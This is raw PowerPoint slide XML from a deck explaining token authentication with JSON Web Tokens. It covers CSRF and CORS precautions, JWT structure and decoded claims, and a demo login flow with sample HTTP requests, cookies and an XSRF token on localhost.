              <a:buChar char="•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08499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Double Submit Cookie Considerations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NEVER DO THIS ON YOUR HTTP RESPONSES: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Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>: *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9336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Origin Header check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Browsers send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header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to know if request is originating from your domain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Cannot be hacked via browser JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAN be modified by a malicious HTTP Proxy (use HTTPS!)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588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u="sng" spc="120" dirty="0" smtClean="0"/>
              <a:t>Modern Web Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng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20000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t>Single Page Apps (“SPAs”), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>AngularJS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2400"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t>Backed by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1"/>
              <a:t>RESTful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t> JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>API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2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>Run in an HTML5 Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>Web Browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>WebKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t> instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>“Hybrid” Mobile apps (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>Phonegap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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endParaRPr lang="en-US" sz="2400" spc="50" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2400"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" spc="50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98514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Session Identifiers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The Server Story</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5287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Session ID Problems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They’re opaque and have no meaning themselves (they’re just ‘pointers’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ook up server state on *every request*.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cannot be used for inter-op with other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9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Alas..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Token Authentication!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16154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Token Authentication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What is Authentication?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A: Proving who you are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Q: What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?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A: Mechanism for persisting that proof, that “assertion”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3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990600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r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Hold tight.. we’re about to go from here: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771" y="31343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943600" y="5105400"/>
            <a:ext cx="2667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r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>..to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590800"/>
            <a:ext cx="2311400" cy="231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14600"/>
            <a:ext cx="35814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3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u="sng" dirty="0" smtClean="0"/>
              <a:t>Token Authentication Workflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Build Secure User Interfaces using JWTs Webin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772400" cy="45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u="sng" dirty="0" smtClean="0"/>
              <a:t>Token Authentication Workflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Build Secure User Interfaces using JWTs Webin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772400" cy="4581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3800"/>
            <a:ext cx="1638300" cy="1638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2000" y="5334000"/>
            <a:ext cx="2527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This looks a lot like the Session ID workflow..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298405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it’s different!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b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>accessToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is special, in fact..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0480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28194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HelveticaNeueLT Pro 65 Md"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="HelveticaNeueLT Pro 65 Md"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>It’s a JSON Web Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US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408631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 the wild they look like just another ugly string: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895600"/>
            <a:ext cx="540150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58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/>
              <a:t>eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>pc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>gImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>lfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEj</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Xk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2064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Security Concerns for Modern Web Apps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 smtClean="0"/>
              <a:t>Web Apps are ‘Untrusted Clients’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Secure user credentials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Secure server endpoints (API)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/>
              <a:t>Prevent malicious code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>executing in client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:spcAft>
                <a:spcPts val="2400"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provide Access Control rules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2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they do have a three part structure.  Each part is a Base64-encoded string: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3657600" cy="2862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eyJ0eXAiOiJKV1QiLA0KICJhb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GciOiJIUzI1NiJ9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eyJpc3MiOiJqb2UiLA0KICJle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HAiOjEzMDA4MTkzODAsDQogIm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>h0dHA6Ly9leGFtcGxlLmNvbS9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>pc19yb290Ijp0cnVlfQ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dBjftJeZ4CVPmB92K27uhbUJU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1p1r_wW1gFWFOEjXk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34290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343400" y="4495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3400" y="5562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3200400"/>
            <a:ext cx="1099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Header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4294221"/>
            <a:ext cx="20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Body (‘Claims’)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9082" y="5350395"/>
            <a:ext cx="320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Cryptographic Signature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8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Base64-decode the parts to find the juicy bits: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81200"/>
            <a:ext cx="3276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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>typ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>":"JWT",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "alg":"HS256"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410986"/>
            <a:ext cx="3276600" cy="17543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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”:”http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trustyapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/”,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "exp"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: 1300819380</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “sub”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: ”users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>8983462”,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “scope”: “self </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/buy”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334000"/>
            <a:ext cx="3276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tß</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>´—™</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>à%O˜v+nî</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SZu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>¯µ€U…8H×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2286000"/>
            <a:ext cx="1251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Header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4038600"/>
            <a:ext cx="234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Body (‘Claims’)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5235642"/>
            <a:ext cx="3710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Cryptographic Signature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342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claims body is the best part!  It can tell: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4648200" cy="39087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{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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>iss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>:”http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>trustyapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/”,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"exp"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: 1300819380,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“sub”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: ”users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>8983462”,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“scope”: “self </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/buy”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7400" y="2667000"/>
            <a:ext cx="291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issued the token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57800" y="29406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3388507"/>
            <a:ext cx="214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When it expires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7800" y="3662142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4114800"/>
            <a:ext cx="243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it represents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257800" y="4388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67400" y="4876800"/>
            <a:ext cx="239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they can do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57800" y="5150435"/>
            <a:ext cx="609600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat" cmpd="sng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3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Implicitly trusted because it is cryptographically signed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Structured data, enabling inter-op between services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an inform your client about basic access control rules (permissions)*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And the big one: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>statelessness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a: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 smtClean="0"/>
              <a:t>*servers must always enforce access control policies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3497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JSON Web Tokens (JWT)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Caveats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Implicit trust is a tradeoff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– how long should the token be good for? how will you revoke it? (Another talk: refresh tokens)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You still have to secure your cookies!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You have to be mindful of what you store in the JWT if they are not encrypted.  No sensitive info!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83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14600"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
        </p:spPr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37338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https://github.com/stormpath/stormpath-sdk-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>angularjs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27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App w/ Login Form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-05-12 at 11.1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06969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01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Login makes POST to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>oauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>/token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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>oauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>token?grant_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost:9000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username=robert%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>40stormpath.com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&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=robert%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>40stormpath.com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45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Server Response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HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>200 OK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set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>XSRF-TOKEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=47255bff-6766-4445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8645-55189427e13d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>; Expires=Wed, 13 May 2015 07:15:33 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GMT;Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=/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set-cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>access_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.ZJD3YlPMq38IcxN335Umeflnte1nFPDEvoSl26rSXkg…; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Expires=Wed, 13 May 2015 07:15:33 GMT; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=/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790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Subsequent Requests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GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://localhost:9000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>things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Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>access_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>eyJpc3MiOiJodHRwczovL2FwaS5zdG9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy8xaDcyUEZXb0d4SEtoeXNLallJa2lyIiwic3ViIjoiaHR0cHM6Ly9hcGkuc3Rvcm1wYXRoLmNvbS92MS9…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X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-XSRF-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>TOKEN:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 47255bff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-6766-4445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-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8645</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-55189427e13d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
